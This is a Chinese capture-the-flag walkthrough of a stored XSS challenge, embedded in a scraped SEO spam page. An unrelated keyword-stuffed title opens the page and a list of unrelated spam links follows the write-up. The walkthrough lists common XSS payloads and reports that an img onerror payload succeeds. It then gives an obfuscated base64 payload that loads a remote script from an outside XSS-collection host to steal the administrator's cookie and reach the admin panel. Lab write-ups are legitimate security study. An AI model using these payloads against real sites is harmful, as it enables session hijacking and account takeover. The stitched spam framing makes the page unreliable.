当前位置: 首页 > news >正文

金融企业网站源码网络营销到底是干嘛的

金融企业网站源码,网络营销到底是干嘛的,宠物网站建设论文总结,上海企业名录地址电话进入靶场 左边是吐槽,右边是登录,先登录试试 admin 123456 admiin# 123456 admin"# 123456 不玩了,先去回顾下xss 回顾完就很尴尬了,我居然用SQL的知识去做xss的题 重来 吐槽这里有一个输入框,容易出现存储型…

进入靶场

左边是吐槽,右边是登录,先登录试试

admin 123456

admiin'# 123456

admin"# 123456

不玩了,先去回顾下xss

回顾完就很尴尬了,我居然用SQL的知识去做xss的题

重来

吐槽这里有一个输入框,容易出现存储型xss漏洞

 

常见的xss payload如下:

 

<script>alert(1)</script>

"><script>alert(1)</script><"

<img src=# onerror=alert(1)>

<svg onload=alert(1)>

都试试

1,<script>alert(1)</script>

访问的时候什么都没有,失败

2,"><script>alert(1)</script><"

根据以上两次尝试,知script被过滤了

3,<img src=# onerror=alert(1)>

出现弹窗1,注入成功

进入xss测试平台XSS平台-XSS测试网站-仅用于安全免费测试

之前没用过,先注册

登录成功

点击左边的创建项目,随便写一个名称

再点击左边的我的项目,右上角的查看配置代码

复制了这个

<img src=c onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPScvL3hzLnBlLzV6Vyc7'))>

但是我的xss平台项目里一直不显示记录(很崩溃啊,想换其他的xss平台,结果都被禁了)

不过得到记录后便会知道backend/admin.php和管理员cookie

 

出现这个页面是我没改cookie

可是我也不知道cookie呀

改cookie就用BP抓包,发送到重放器,在请求里改

就知道flag了

 

 

 

 

 

 

 

 

 

http://www.zhongyajixie.com/news/29467.html

相关文章:

  • 上海商城网站建设公司广州各区正在进一步优化以下措施
  • 外贸自建站多久能出单竞价网
  • 网站建设开发案例网络平台推广运营有哪些平台
  • 电子商务网站设计的三大原则seo培训学院
  • 网站备案密码如何写推广软文
  • 长沙做旅游网站多少钱黄页网推广服务
  • 邯郸微信公众号开发关键词优化是怎么弄的
  • 南宁建设工程造价信息网站专业seo培训学校
  • 网站建设是否需要源代码河源市企业网站seo价格
  • 厦门专业网站seo优化啥意思
  • web app 网站电脑系统优化软件十大排名
  • 做购物网站要多少钱whois查询 站长工具
  • 专门做正品的网站手机版seo是什么牌子
  • 织梦如何做网站地图优化网站推广排名
  • wordpress做管理网站网站排名优化快速
  • 怎么免费做网站推广百度文库个人登录入口
  • 淘淘乐网站建设西安网络seo公司
  • 三五互联做网站吗西安网站建设制作
  • 泰安可靠的网站建设sem和seo有什么区别
  • 不良网站进入窗口软件下载7潮州seo建站
  • 英文网站导航 源码阿里云域名注册入口官网
  • wordpress对接COS后网站变慢网站建设平台
  • 博客网站设计及说明如何在各种网站投放广告
  • wordpress 站内信 群发合肥瑶海区房价
  • 做网站首选科远网络免费建一个自己的网站
  • 石家庄网站建设推广公司哪家好真实的网站制作
  • 对网站建设行业的了解短视频营销推广策略
  • 网站备案 法人身份证电商平台怎么搭建
  • 网站做图片滚动杭州网站优化多少钱
  • 专业图书商城网站建设互联网广告销售是做什么的